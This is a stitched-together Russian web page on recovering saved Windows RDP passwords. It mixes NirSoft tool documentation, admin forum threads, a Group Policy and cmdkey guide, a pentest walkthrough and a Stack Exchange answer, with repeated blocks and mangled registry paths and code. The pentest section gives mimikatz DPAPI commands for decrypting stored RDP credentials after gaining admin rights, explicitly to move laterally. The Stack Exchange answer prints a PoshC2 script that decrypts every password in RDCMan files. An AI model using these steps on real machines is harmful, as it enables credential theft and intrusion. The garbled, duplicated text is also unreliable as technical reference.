Как посмотреть сохраненный пароль rdp windows 10
Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.
Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility. You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):
Network Password Recovery
CredentialsFileView
Versions History
- Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
- Version 1.01 — The configuration is now saved to a file instead of the Registry.
- Version 1.00 — First release.
License
This utility is released as freeware. You are allowed to freely distribute this utility via floppy disk, CD-ROM, Internet, or in any other way, as long as you don’t charge anything for this. If you distribute this utility, you must include all files in the distribution package, without any modification !
Be aware that selling this utility as a part of a software package is not allowed !
Disclaimer
The software is provided «AS IS» without any warranty, either expressed or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. The author will not be liable for any special, incidental, consequential or indirect damages due to loss of data or any other reason.
Using Remote Desktop PassView
Remote Desktop PassView doesn’t require any installation process or additional DLL files. Just copy the executable (rdpv.exe) to any folder you like, and run it. After you run rdpv.exe, the main window display the passwords of .rdp located under your «My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location
If you want to recover that password of another .rdp file, just drag the file from Explorer into the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.
Be aware that Remote Desktop PassView can only recover the passwords created by your current logged on user. It cannot recover the passwords of .rdp files created by other users.
Translating Remote Desktop PassView To Another Language
- Run Remote Desktop PassView with /savelangfile parameter:
rdpv.exe /savelangfile
A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility. - Open the created language file in Notepad or in any other text editor.
- Translate all menus, dialog-boxes, and string entries to the desired language.
- After you finish the translation, Run Remote Desktop PassView, and all translated strings will be loaded from the language file.
If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move it to another folder.
Feedback
If you have any problem, suggestion, comment, or you found a bug in my utility, you can send a message to nirsofer@yahoo.com
Remote Desktop PassView is also available in other languages. In order to change the language of Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’, and put it in the same folder that you Installed Remote Desktop PassView utility.
Где хранятся пароли rdp в windows 10
Ситуация:имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.
- Remove From My Forums
Вопрос
Ситуация:
имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел. P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.
- Изменено 28 сентября 2009 г. 14:46
Добавлен p.s.
Ответы
Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»
MCSE, MCTS, MCITP, STS, VTSP
Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey
- Предложено в качестве ответа
Buchenkov Andrey
29 сентября 2009 г. 5:55 - Помечено в качестве ответа
gamumba
29 сентября 2009 г. 6:55
Так выглядит финальный диалог Мастера программы с найденными и расшифрованными паролями удаленного рабочего стола (в автоматическом режиме работы).
Пароли Remote Desktop Connections хранятся в *.rdp файлах и обычно находятся в папке ‘My Documents‘ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.
Если *.rdp файл по какой-то причине не был найден, то можно воспользоваться поиском самостоятельно и указать путь к нему вручную.
Посмотреть список доступных конфигураций удаленного рабочего стола можно из меню Пуск -> Все программы -> Стандартные -> Связь -> Подключение к удаленному рабочему столу.
После того, как необходимая конфигурация будет выбрана, можно переходить к следующему шагу Мастера программы — указанию дополнительных параметров для расшифровки. Поскольку пароль удаленного рабочего стола шифруется с помощью системного механизма DPAPI, то нам необходимо знать три вещи:
- Логон пароль владельца информации (rdp файла в нашем случае)
- Мастер Ключ пользователя
- И его SID.
Как правило, в случае с локальной учетной записью, последние два параметра заполняются программой автоматически. Иначе, вам необходимо позаботиться об этом самостоятельно.
Встроенный RDP клиент Windows (mstsc.exe) позволяет сохранить на компьютере имя и пароль пользователя для подключения к удаленному рабочему столу. Благодаря этому пользователю не нужно каждый раз вводить пароль для подключения к удаленному RDP компьютеру/серверу. В этой статье мы рассмотрим, как разрешить сохранять учетные данные для RDP подключений в Windows, и что делать, если несмотря на все настройки, у пользователей не сохраняются пароли для RDP подключения (пароль запрашивается каждый раз)
- Как сохранить пароль для RDP подключения в Windows?
- Что делать, если в Windows не сохраняется пароль для RDP подключения?
- Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными
- Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные
Как сохранить пароль для RDP подключения в Windows?
По умолчанию Windows разрешает пользователям сохранять пароли для RDP подключений. Для этого в окне клиента Remote Desktop Connection (mstsc.exe) пользователь должен ввести имя удаленного RDP компьютера, учетную запись и поставить галку “Разрешить мне сохранять учетные данные” (Allow me to save credential). После того, как пользователь нажимает кнопку “Подключить”, RDP сервер запрашивает пароль и компьютер сохраняет его в Windows Credential Manager (не в .RDP файл).
При следующем подключении к удаленному RDP серверу под этим же пользователем, клиент автоматически получит сохраненный пароль из менеджера паролей Windows и использует его для RDP-аутентификации.
Если для данного компьютера имеется сохраненный пароль, в окне RDP клиента будет указано:
При подключении к данному компьютеру будут использоваться сохранённые учетные данные. Эти учетные данные можно изменить или удалить.
Saved credentials will be used to connect to this computer. You can edit or delete these credentials.
В большинстве случаев администраторы не рекомендуют пользователям сохранять пароли подключений в Windows. Например, в домене Active Directory лучше настроить SSO (Single Sign-On) для прозрачной RDP аутентификации.
По умолчанию Windows не разрешает пользователю использовать сохраненный пароль RDP подключения с компьютера, добавленного в домен Active Directory, к компьютеру/серверу, который находится в другом домене или рабочей группе. Несмотря на то, что пароль для подключения сохранен в Credentials Manager, Windows не позволяет его использовать, и требует от пользователя каждый раз вводить пароль. Также Windows не разрешает использовать сохраненный пароль для RDP, если вы подключаетесь не под доменной, а под локальной учетной записью.
При попытке RDP подключения с сохраненным паролем в этой ситуации появляется окно с ошибкой:
Your Credentials did not work
Your system administrator does not allow the use of saved credentials to log on to the remote computer CompName because its identity is not fully verified. Please enter new credentials.
Или (в русской редакции Windows 10):
Недопустимые учетные данные
Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера CompName, так как его подлинность проверена не полностью. Введите новые учетные данные.
Windows считает такое подключение небезопасным, т.к. отсутствуют доверительные отношения между этим компьютером и удаленным компьютером/сервером в другом домене (или рабочей группе).
Вы можете изменить эти настройки на компьютере, с которого выполняется RDP подключение:
- Откройте редактор локальной GPO, нажав Win + R ->gpedit.msc ;
- В редакторе GPO перейдите в раздел Computer Configuration –> Administrative Templates –> System –> Credentials Delegation (Конфигурация компьютера -> Административные шаблоны -> Система -> Передача учетных данных). Найдите политику с именем Allow delegating saved credentials with NTLM-only server authentication (Разрешить передачу сохраненных учетных данных с проверкой подлинности сервера только NTLM);
- Дважды щелкните по политике. Включите политику (Enable) и нажмите на кнопку Показать (Show);
- В открывшемся окне нужно будет указать список удаленных компьютеров (серверов), для которых будет разрешено использовать сохранные пароли для RDP подключения. Список удаленных компьютеров нужно указать в следующих форматах:
- TERMSRV/server1
— разрешить использование сохранённых паролей для RDP подключения к одному конкретному компьютеру/серверу; - TERMSRV/*.winitpro.ru
— разрешить RDP подключение ко всем компьютерам в домене winitpro.ru; - TERMSRV/*
— разрешить использование сохранённого пароля для подключения к любым компьютерам.
- TERMSRV/server1
Примечание. TERMSRV нужно обязательно писать в верхнем регистре, а имя компьютера должно полностью соответствовать тому, которое вы указываете в поле подключения RDP клиента.
Этим настройкам GPO соответствуют следующие параметры реестра:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegation] "AllowSavedCredentialsWhenNTLMOnly"=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegation] “AllowSavedCredentialsWhenNTLMOnly”=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*"
Credential Manager ErrorUnable to save credentials. To save credentials in this vault, check your computer configuration.Error code: 0x80070520 Error Message: A specified logon session does not exist. It may already have been terminated.
Теперь при выполнении RDP подключения клиент mstsc сможет использовать сохранённый пароль.
Вы можете вывести список сохранённых паролей для RDP подключений с помощью команды:
cmdkey /list ^| findstr «target=TERMSRV»
Чтобы очистить сохраненные пароли подключений, выполните команду:
For /F «tokens=1,2 delims= » %G in (‘cmdkey /list ^| findstr «target=TERMSRV»‘) do cmdkey /delete %H
С помощью локального редактора групповых политик вы сможете переопределить политику только на локальном компьютере. Если вы хотите чтобы политика разрешения использования сохранённых паролей для RDP подключения действовала на множество компьютеров домена, используете доменные политики, которые настраиваются с помощью консоли gpmc.msc.
Что делать, если в Windows не сохраняется пароль для RDP подключения?
Если вы настроили Windows по инструкции выше, но клиент все равно при каждом повторном RDP подключении требует ввести пароль следует проверить следующее:
- В окне RDP подключения нажмите на кнопку “Показать параметры” и убедитесь, что опция “Всегда запрашивать учетные данные” (Always ask for credentials) не выбрана;
- Если вы используете для подключения сохранённый RDP файл, проверьте, что параметр “prompt for credentials” равен 0 (
prompt for credentials:i:0
); - Запустите редактор локальной групповой политики
gpedit.msc
, перейдите в раздел Конфигурация компьютера -> Компоненты Windows -> Службы удаленных рабочих столов -> Клиент подключения к удаленному рабочему столу (Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client). Параметры “Запретить сохранение паролей” (Do not allow passwords to be saved) и Prompt for credentials on the client computer должны быть не заданы или отключены. Также убедитесь, что он отключен в результирующей политике на вашем компьютере (html отчет с применёнными настройками доменных политик можно сформировать с помощью gpresult); - Удалите все сохраненные пароли в менеджере паролей Windows (Credential Manager). Наберите
control userpasswords2
и в окне “Учетные записи пользователей” перейдите на вкладку “Дополнительно” и нажмите на кнопку “Управление паролями”; В открывшемся окне выберите “Учетные данные Windows”. Найдите и удалите все сохраненные RDP пароли (начинаются с TERMSRV/…).
Из этого окна вы можете самостоятельно добавить учетных данные для RDP подключений. Обратите внимание, что имя удаленного RDP сервера (компьютера) нужно указывать в формате TERMSRVserver_name1. При очистке истории RDP подключений на компьютере, не забывайте удалять сохраненные пароли.
После этого, пользователи смогут использовать свои сохраненные пароли для rdp подключений.
Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными
При подключении к RDP хосту или ферме RDS с помощью сохраненного пароля может появится ошибка:
Windows Security Your credentials did not work The server’s authentication policy does not allow connection requests using saved credentials. Please enter new credentials.
Политика проверки подлинности на сервере не допускает запросы на подключение с использованием сохраненных учетных данных.
В этом случае на удаленном сервере нужно отключить параметр “Always prompt for password upon connection” в разделе Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host -> Security.
Если эта политика включена, RDP хост всегда запрашивает у клиента пароль для подключения.
Можно включить этот параметр через реестр:
REG add «HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services» /v fPromptForPassword /t REG_DWORD /d 0 /f
Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные
После обновления до Windows 11 22H2 пользователи стали жаловаться, что теперь они не могут использовать сохраненные пароли для RDP подключений:
Windows Security: Your credentials did not work Windows Defender Credential Guard does not allow using saved credentials. Please enter your credentials.
Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные.
Представленные еще в Windows 10 1607 компонент Windows Defender Remote Credential Guard должен защищать ваши учетные данные для RDP подключений. В обновлении 22H2 по умолчанию он разрешает использовать сохраненные учетные данные только при использовании Kerberos аутентификации на RDP хосте. Если нельзя использовать Kerberos (контроллер домена не доступен, или вы подключаетесь к хосту в рабочей группе), Remote Credential Guard блокирует аутентификацию с помощью NTLM.
Для решения этой проблемы придется отключить Credential Guard через реестр:
New-ItemProperty -Path «HKLM:SystemCurrentControlSetControlLSA» -Name «LsaCfgFlags» -PropertyType «DWORD» -Value 0 -Force
0x01 введение
После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.
0x02 Получить пароль RDP, сохраненный локально на управляемой машине
Один, мимикатц
1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
Просмотр информации об удаленном хосте, сохраненной локально
cmdkey /list
3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.
mimikatz # privilege::debug mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58
4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.
mimikatz # sekurlsa::dpapi
5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d
Два, netpass
скачать:
netpass
использовать:
Дважды щелкните netpass.exe.
:
Три, другие
Скрипт Powershell для автоматизации дешифрования …
Как посмотреть сохраненный пароль rdp windows 10
Remote Desktop PassView is a small utility that reveals the password stored by
Microsoft Remote Desktop Connection utility inside the .rdp files.
Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):
Network Password Recovery
Versions History
- Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
- Version 1.01 — The configuration is now saved to a file instead of the Registry.
- Version 1.00 — First release.
License
This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !
Be aware that selling this utility as a part of a software package is not allowed !
Disclaimer
The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.
Using Remote Desktop PassView
Remote Desktop PassView doesn’t require any installation process or additional DLL files.
Just copy the executable (rdpv.exe) to any folder you like, and run it.
After you run rdpv.exe, the main window display the passwords of .rdp located under your
«My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location
If you want to recover that password of another .rdp file, just drag the file from Explorer into
the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.
Be aware that Remote Desktop PassView can only recover the passwords created by your current
logged on user. It cannot recover the passwords of .rdp files created by other users.
Translating Remote Desktop PassView To Another Language
Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
to other languages.
In order to do that, follow the instructions below:
-
Run Remote Desktop PassView with /savelangfile parameter:
Feedback
If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com
Remote Desktop PassView is also available in other languages. In order to change the language of
Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
and put it in the same folder that you Installed Remote Desktop PassView utility.
0x01 введение
После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.
0x02 Получить пароль RDP, сохраненный локально на управляемой машине
Один, мимикатц
1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
Просмотр информации об удаленном хосте, сохраненной локально
cmdkey /list
3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.
mimikatz # privilege::debug mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58
4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.
mimikatz # sekurlsa::dpapi
5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d
Два, netpass
скачать:
netpass
использовать:
Дважды щелкните netpass.exe.
:
Три, другие
Скрипт Powershell для автоматизации дешифрования …
- Remove From My Forums
Вопрос
Ситуация:
имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел. P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.
- Изменено 28 сентября 2009 г. 14:46
Добавлен p.s.
Ответы
Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»
MCSE, MCTS, MCITP, STS, VTSP
Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey
- Предложено в качестве ответа
Buchenkov Andrey
29 сентября 2009 г. 5:55 - Помечено в качестве ответа
gamumba
29 сентября 2009 г. 6:55
Где хранит пароли RDP-клиент? (win7)
Реально ли выдернуть учетку?
1 — 07.10.12 — 13:51
Панель управления — учетные записи пользователей — диспетчер учетных данных
2 — 07.10.12 — 16:35
(1) да при чем тут учетки юзеров?
Где физически хранятся пароли (хеши) от RDP-клиента?
3 — 07.10.12 — 16:36
учись пользоваться яндексом и гуглом
4 — 07.10.12 — 16:36
(2) в моих документах файлики лежат рдпшные
скрытые вроде как
5 — 07.10.12 — 16:38
6 — 07.10.12 — 16:41
Итак, на рабочем столе есть ярлык RDP. В нем сохранена учетная запись для подключения (user&pass)
Мне пароль нада посмотреть
7 — 07.10.12 — 23:32
ярлык указывает на %windir%system32mstsc.exe
пароля там нет
8 — 07.10.12 — 23:33
9 — 07.10.12 — 23:33
всё в реестре, в жутко зашифрованном виде
10 — 07.10.12 — 23:33
11 — 07.10.12 — 23:34
12 — 07.10.12 — 23:38
(9) Не уверен, что даже сама винда сможет расшифровать пароль. Скорее всего, хранятся только кеши.
13 — 07.10.12 — 23:42
винда точно не сможет
14 — 07.10.12 — 23:45
(10) а по ссылке сходить. все там можно
Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 с паролем Kleo, типа:
cmdkey / дополнения: сервер / пользователь: mikedan / пароль: Kleo
Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 и приглашение для ввода пароля всякий раз, когда Server01 доступ, типа:
cmdkey / дополнения: сервер / пользователь: mikedan
15 — 07.10.12 — 23:47
16 — 07.10.12 — 23:53
Отображает список имен пользователей и учетных данных. Если TargetName не указано, все сохраненные имена пользователей и учетные данные будут перечислены.
17 — 07.10.12 — 23:57
речь вообще-то о паролях
18 — 07.10.12 — 23:58
так что «и?»
19 — 08.10.12 — 00:00
20 — 08.10.12 — 00:01
ну так там внимательно по ссылке.
Creates, lists and deletes stored user names and passwords or credentials.
passwords это слово видим ?
21 — 08.10.12 — 00:04
(0) Вообще на сколько я читал пароли кодируются с привязкой то ли к учетной записи, то ли к машине. Тоесть вроде как расшифровать можно но только на том же компьютере/пользователе.
Погугли на тему RDP + CryptProtectData и CryptUnrotectData
22 — 08.10.12 — 00:08
23 — 08.10.12 — 00:26
(0) забыл пароль, смени на новый.
ИМХО, такой вопрос (попытка на него ответить) не только правила форума нарушает, но и попадает под действие УК РФ
24 — 08.10.12 — 09:30
(23) да, вы правы. Пароль забыл, пароль сменю.
Тему можно закрывать
Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?
I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.
I have tried this method, but (unsurprisingly) I get
«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»
(XXX is my current home login.)
1,378 9 silver badges 20 bronze badges
asked Jul 20, 2016 at 14:33
Here’s a Powershell script that will do the job…
Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.
> $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)
Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME
answered Jan 4, 2017 at 14:59
211 2 silver badges 3 bronze badges
Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1
In case the link fails here’s the content for reference:
function Decrypt-RDCMan ($FilePath) < if (!$FilePath) < [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings" $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" $Xml | select-object -ExpandProperty "Node"| % > else < [xml]$Types = Get-Content $FilePath $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" # depending on the RDCMan version we may need to change the XML search $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" ># depending on the RDCMan version, we may have to use search through the #text field in the XML structure $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n">> > function Decrypt-DPAPI ($EncryptedString) < # load the Security Assembly into the PS runspace Add-Type -assembly System.Security $encoding= [System.Text.Encoding]::ASCII $uencoding = [System.Text.Encoding]::UNICODE # try and decrypt the password with the CurrentUser Scope try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < echo "Could not decrypt password" >> >
Execute the script in Powershell ISE, that should register the functions. Then simple run:
Decrypt-RDCMan -FilePath MyRDGfile.rdg
answered Oct 20, 2018 at 8:03
Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?
I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.
I have tried this method, but (unsurprisingly) I get
«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»
(XXX is my current home login.)
1,378 9 silver badges 20 bronze badges
asked Jul 20, 2016 at 14:33
Here’s a Powershell script that will do the job…
Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.
> $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)
Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME
answered Jan 4, 2017 at 14:59
211 2 silver badges 3 bronze badges
Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1
In case the link fails here’s the content for reference:
function Decrypt-RDCMan ($FilePath) < if (!$FilePath) < [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings" $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" $Xml | select-object -ExpandProperty "Node"| % > else < [xml]$Types = Get-Content $FilePath $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" # depending on the RDCMan version we may need to change the XML search $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" ># depending on the RDCMan version, we may have to use search through the #text field in the XML structure $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n">> > function Decrypt-DPAPI ($EncryptedString) < # load the Security Assembly into the PS runspace Add-Type -assembly System.Security $encoding= [System.Text.Encoding]::ASCII $uencoding = [System.Text.Encoding]::UNICODE # try and decrypt the password with the CurrentUser Scope try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < echo "Could not decrypt password" >> >
Execute the script in Powershell ISE, that should register the functions. Then simple run:
Decrypt-RDCMan -FilePath MyRDGfile.rdg
answered Oct 20, 2018 at 8:03
Нажмите клавишу Windows и введите: расширенная система. Щелкните Просмотр дополнительных настроек системы. Щелкните вкладку «Удаленный» и выберите «Разрешить удаленные подключения к этому компьютеру». Установите флажок «Проверка подлинности на уровне сети» для большей безопасности.
В служебной программе «Управление компьютером» перейдите в «Локальные пользователи и группы»> «Пользователи», затем щелкните правой кнопкой мыши нужного пользователя удаленного рабочего стола (пользователь по умолчанию — ServerAdmin) и выберите Установить пароль…. Во всплывающем окне выберите «Продолжить» и завершите смену пароля.
Как мне найти свои учетные данные для удаленного рабочего стола?
